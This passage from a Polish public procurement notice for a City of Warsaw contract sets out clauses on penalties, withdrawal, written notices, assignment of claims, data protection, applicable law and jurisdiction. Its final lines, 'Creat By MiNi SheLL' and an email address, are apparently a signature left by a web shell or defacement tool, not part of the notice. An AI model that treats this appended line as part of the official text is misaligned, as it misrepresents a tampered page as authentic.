2. Dokonane potrącenia i naliczone kary umowne nie zwalniają Wykonawcy z obowiązku wykonania prac zgodnie z umową.
3. Odstąpienie od umowy wymaga formy pisemnej pod rygorem nieważności.
4. W przypadku odstąpienia od umowy , Zamawiający jest zobowiązany do odbioru prac wykonanych do chwili ich przerwania.
5. Odstąpienie od umowy nie ma wpływu na możliwość żądania i dochodzenia przez Zamawiającego od Wykonawcy kar umownych , wynikających z niniejszej umowy 
§ 11
1.Wszelkie powiadomienia, czy wezwania dla drugiej Strony w wykonaniu postanowień niniejszej umowy, z zastrzeżeniem wyjątków przewidzianych w umowie, wymagają formy pisemnej i będą przesłane listem poleconym za potwierdzeniem odbioru na adres strony określony w niniejszej umowie.  W okresie trwania umowy strony umowy są obowiązane informować się nawzajem na piśmie o każdej zmianie adresu swojego zamieszkania lub siedziby. W razie zaniedbania tego obowiązku korespondencję wysłaną na ostatni adres listem poleconym, za potwierdzeniem odbioru i nieodebraną, uważa się za doręczoną.
2.Strony umowy zgodnie ustalają, iż Wykonawca bez zgody Zamawiającego wyrażonej w formie pisemnej pod rygorem nieważności nie może dokonać na rzecz osoby trzeciej cesji wierzytelności wynikającej z niniejszej umowy. 
3.Strony umowy stwierdzają, iż zapoznały się z umową i dokonały interpretacji jej poszczególnych postanowień, w celu wyeliminowania ewentualnych mogących powstać   przyszłości sporów na tle jej wykonania. 
4. Wykonanie niniejszej umowy nie wiąże się z przetwarzaniem danych w rozumieniu ustawy  o ochronie danych osobowych, dla których administratorem danych jest Prezydent m. st. Warszawy a co za tym idzie nie wiąże się z dostępem do zasobów systemów informatycznych Urzędu m. st. Warszawy.
§ 12
1.W sprawach nieuregulowanych niniejszą umową mają zastosowanie przepisy :
1/ ustawy Prawo zamówień publicznych; 
2/ Kodeksu Cywilnego. 
2.Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.
§ 13
W przypadku powstania sporu na tle realizacji niniejszej umowy może być on skierowany na drogę postępowania sądowego w  sądzie właściwym miejscowo dla siedziby Zamawiającego 14 
Umowę niniejszą sporządzono w 3 jednobrzmiących egzemplarzach, 2 egzemplarze dla Zamawiającego, 1 egz. dla Wykonawcy</p>

<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com